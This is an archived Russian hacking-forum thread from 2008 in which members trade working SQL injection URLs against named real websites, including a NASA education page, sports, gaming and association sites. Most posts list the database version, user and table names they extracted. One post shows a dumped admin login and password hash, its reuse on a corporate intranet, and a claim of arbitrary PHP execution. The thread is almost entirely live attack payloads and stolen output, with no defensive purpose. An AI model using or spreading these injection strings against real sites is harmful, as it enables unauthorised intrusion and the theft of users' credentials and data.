Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.09.2008, 22:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Это к посту выше через пост 
http://www.cotraj.ru/catalog.php?cat=1/**/union/**/select/**/version()/**/limit/**/1,1/*
user - cotraj@yox.hc.ru
database - wwwcotrajru |
|
|
23.09.2008, 01:31
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://vnorilske.ru/index.php?page_id=40&fi_sex=1%20union%20select%20v ersion(),user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,database(),20,21,22,23/*&f_online=1
Версия 5.0.45-community-nt-log
Пользователь eleonora65465RT@localhost
База knopotuska
|
|
|
|
23.09.2008, 08:47
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
nasa.gov
Код HTML:
http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=null%27%20Union%20Select%20%201%20,2,3,concat_ws(char(58),user,password),5,6,7,8,9,10,11,12,13%20,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%20,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201+from+mysql.user/*
|
|
|
|
23.09.2008, 10:02
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Очередная контора делающая сайты "лучше" других...
Была найдена бага в http://www.tta.su
Функци класса concat, hex etc.. не работают, поэтому:
http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_name,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24+from+tennis_us ers+limit+0,10--
http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_password,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tenni s_users+limit+0,10--
login:Sam_Fox pass:42e404a41193717e192856392b2b21b6
В данном случае, имеется доступ к нескольким базам, от разных сайтов.
Поковырявшись и пораскинув мозгом, было выявлено, что среди прочих там присутствуют:
bizedu.ru
tta.su
proftests.ru
...
proftests.ru <- внутренний корпоративный сайт всей этой гоп-компании(только длясотрудников сайт).
логин и пасс, которые мы поимели с tta.su(Sam_Fox) -> подходят(админовский акк, по крайней мере этот).
Есть возможность выполнения произвольного php кода, через "администрирование контента".
|
|
|
|
23.09.2008, 12:33
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Довольно крупный игровой портал.
http://www.rolemancer.ru/article.php?sid=-1{SQLINJ}
Database Version: 4.1.7
Database name: rolemancer
User name: rolemancer@localhost
Table : users
name
pass
uname
email
uid
user_icq
user_viewemail
Table : authors
aid
email
name
pwd
Последний раз редактировалось R1dex; 23.09.2008 в 13:15..
|
|
|
|
23.09.2008, 16:13
|
|
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950
Репутация:
54
|
|
http://www.offsidetalk.com
Код:
http://www.offsidetalk.com/thread.php?id=22&postNum=21=null%20union%20all%20select%200,concat(version(),0x3c62723e,database(),0x3c62723e,user()),2,3,4,5+from+users--
version() => 5.0.67-log
database() => cosa
user() => wyrddave@edsel.dreamhost.com
БД:
Таблицы cosa:
Код:
Posts_1
Posts_10
Posts_11
Posts_12
Posts_13
Posts_14
Posts_15
Posts_16
Posts_17
Posts_18
Posts_19
Posts_2
Posts_20
Posts_21
Posts_22
Posts_23
Posts_24
Posts_25
Posts_26
Posts_27
Posts_28
Posts_29
Posts_3
Posts_30
Posts_31
Posts_32
Posts_33
Posts_34
Posts_35
Posts_36
Posts_37
Posts_38
Posts_39
Posts_4
Posts_40
Posts_41
Posts_42
Posts_43
Posts_44
Posts_45
Posts_46
Posts_47
Posts_48
Posts_49
Posts_5
Posts_50
Posts_51
Posts_52
Posts_53
Posts_54
Posts_55
Posts_56
Posts_57
Posts_58
Posts_59
Posts_6
Posts_60
Posts_61
Posts_62
Posts_63
Posts_64
Posts_65
Posts_66
Posts_67
Posts_68
Posts_7
Posts_8
Posts_9
admin
affil_lookup
amazonLinks
authorInfo
blogComments
blogComments_1
blogs
bookmarks
bugComments
bugs
colors
dailyStats
dailyThreadInfo
dailyUserStats
deadToMe
dirAffiliates
errorLog
exports_highlights
exports_subs
exports_threads
exports_users
extras
folderOrder
folders
forumPrefs
highlights
highlights_old
hits
hostedThread
imported_subs
imported_threads
ints
limeusers_config
limeusers_info
limeusers_sessions
limeusers_users
limewiki_nodehistory
limewiki_nodes
nameChange
poll_
poll__responses
poll_answers
poll_questions
pollresults_1
polls
portal_fields
portals
prefs
recent
search
sessions
subscriptions
sugComments
suggestions
taggedThreads
tags
test
testing
threadRules
threadTags
threads
time
tmp
userAccess
userStatus
user_abdabs
user_acourfoutfify
user_admin
user_affonvinevy
user_agorenbo
user_ahmadenajadsukka
user_alexisamore
user_alfpidasant
user_alladobeoemsoftdownload
user_amelyfo
user_ameshymoomy
user_andrew
user_appeaktrato
user_appefsnab
user_aromatizatorzzzy
user_ashtonmoore
user_asistond
user_avavincent
user_bakalinvadbad
user_beencydoolo
user_beishticrit
user_benderkoz
user_bestsfarmasshops
user_biidbkonudyinffh
user_billybossman
user_billyboyka
user_bionnesyslele
user_blackdog
user_blackrose
user_bligetabaiste
user_bob
user_boicioulk
user_boxvista
user_boydaytub
user_bozybouslysop
user_breelszet
user_brett
user_brianabanks
user_britneyloverii
user_brorwaypago
user_buycheapsoftwareyy
user_buycheapviagracialisss
user_buycheapviagracialiszz
user_buyviagraonlineusatoday
user_bypehyday
user_centerprestigsss
user_cesycausync
user_chaseshdstforum
user_cheapviagracialissr
user_chelle
user_chezza00
user_chezza38
user_chimchans
user_cialisbestprice
user_comprarviagraonlinejo
user_coodynexme
user_cooperbryantalwilda
user_creativeacrobate
user_designerinfo
user_dhbhsmdviu
user_diewololorled
user_djaambi11
user_donmandronas
user_donttouchmethere
user_dooguelog
user_downloadadobephotoshopfree
user_downloadcheapoemfree
user_downloadcheapoemstore
user_drakssick
user_drwebbn
user_dugmentorweb
user_dvdcattrisept
user_effikeingem
user_emonetoff
user_encotoaddet
user_entenueaccobe
user_enzytforum
user_epherfede
user_essencerec
user_esservehigo
user_eucmwtjasygck
user_eustoss
user_evellineiris
user_faidebisa
user_fartsnidatt
user_fiexindip
user_fildermac
user_flumemalp
user_foggy
user_franchesco
user_francis
user_frankexr
user_frieseejege
user_fuckahmadenagad
user_gaildclemmer
user_gapydyewere
user_genyakka
user_geoff
user_georgieworst
user_glopsipsels
user_gnomikl
user_godcousins
user_gogejeawbange
user_gokecrove
user_goldencarnns
user_gradsmrad
user_granciatskica
user_greessinise
user_gremlin
user_gremlinbug
user_handbagsro
user_hedoerromandy
user_hieplethy
user_hilmretle
user_hirefinfiploff
user_homedoctor
user_hughe
user_iambert
user_iloveme
user_inhineeideobe
user_interneprestyw
user_inzzforever
user_ireneaveline
user_jesikafclq
user_jo
user_johnnyxq
user_jono
user_kamikaze
user_kamikazekeeper
user_kamikazenutter
user_kenzy
user_kenzy10
user_kikemran
user_kildfuddy
user_krazykeeper
user_kristinavoicc
user_labudash
user_lalpdyday
user_lawotep
user_leakinmycrownjewels
user_leccepenincah
user_lelisilltoura
user_lime
user_lindmannnn
user_lingmesse
user_litantene
user_llblackslutsll
user_looreed
user_maisonvq
user_mancitymad
user_manufactureoemsoftware
user_marlborocig
user_medeqaz
user_meespalhekper
user_mefeoppongoni
user_metrocarryzjj
user_metrocashcarryry
user_metrosarrysfgt
user_mikeusay
user_milenajaf
user_mofflugsnom
user_moxeyel
user_mr
user_nat
user_niaikep
user_notasobr
user_nunziatoelizabeth
user_offleaseru
user_onepubrerib
user_onlinecialisviagrabuy
user_onpakkpwmwmvfr
user_ordervini
user_oscarjackson
user_oschepkovz
user_photoshopadob
user_phydaysteesty
user_pikolezaks
user_pluslondoms
user_polmangirl
user_portjassica
user_prestigesmwm
user_privettutja
user_promskladstanki
user_puzobok
user_rabbit70
user_randyspears
user_reibrawhite
user_rensiobbips
user_samantharo
user_sateliterus
user_satuedeclelve
user_scarletmillie
user_selpkeemi
user_serga
user_sexmastergb
user_sextube
user_shancyvagnene
user_sheridansup
user_shurfastifift
user_sizeaspem
user_skvbirzharu
user_sonserryvierohome
user_srmt
user_sselldumps
user_stafkolter
user_stankotorgforum
user_strongjannabiz
user_suiquehig
user_supunmano
user_tanyalarina
user_tarfbrefemebyv
user_taupdaptoks
user_tedvatcatitest
user_testyjo
user_thegoalie
user_thegoalie2
user_thomas1
user_tipokotpu
user_tosifers
user_towtucttons
user_trastuso
user_tritinvallemn
user_twntysevnbase
user_viagrabuycheapestvigras
user_viagracheaprice
user_viagracialislischeapest
user_vistaultimatedownloadapro
user_voliidiowly
user_wepallomo
user_westomkew
user_wyrddave
user_xolonho
user_yongbers
user_youngic
user_yrealmale
user_zalivaika
users[password, email]
violations
Закалибался выковыривать )) 371 таблица..
Можно сделать отличный дамп.
+ мну...
http://csteachers.org
Код:
http://csteachers.org/thread.php?id=4&postNum=3=null%20union%20all%20select%200,concat(version(),0x3c62723e,database(),0x3c62723e,user()),2,3,4,5--
version() => 4.1.16-standard-log
database() => csteachers
user() => csteachers@jmkdb.theperfectworld.us
Последний раз редактировалось ArxWolf; 23.09.2008 в 16:21..
|
|
|
|
23.09.2008, 22:06
|
|
Познающий
Регистрация: 21.09.2008
Сообщений: 42
Провел на форуме:
127017
Репутация:
61
|
|
MySQL: 5.0.51a-log
DBASE: host1843
USER: host1843@10.7.0.2
_http://www.nord-east.ru/index.php?id=-1%20union%20select%201,concat_ws(char(58),login,pa ss),3,4%20from%20auth%20--
Админку не нашел (
|
|
|
|
23.09.2008, 22:54
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.smf.org.uk/events.php?section_id=4
Dbname: smforg_smf
Version: 4.1.22-standard
Username: smforg_smforg@localhost
|
|
|
|
24.09.2008, 15:25
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Ассоциация выпускников Международной стипендии Президента Республики Казахстан «Болашак» o_O
http://www.bolashak.kz/?lang=ru&type=news&id=-46+union+select+1,2,version(),4,5,6,7,8+from+phpbb _users/*
p.s : таблы заебся подбирать, там есть форум phpbb но что то мне подсказывает что всё зранится в разных базах... |
|
|
|
24.09.2008, 19:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.dwaa.org.uk/showevent.php?eventID=25UNION+SELECT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37+LIMIT+1,1/*
Dbname: dwaa
Version: 4.1.18
Username: janet@localhost
================================================== =========
http://www.pemadam.org.my/cda/m_counselling/csl_view.php?id=86UNION+SELECT+1+LIMIT+1,1/*&crumb=MIZ.NAA
и снова 4 ((
Dbname: pemadam_06
Version: 4.1.7-nt
Username: pemadam_cc@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
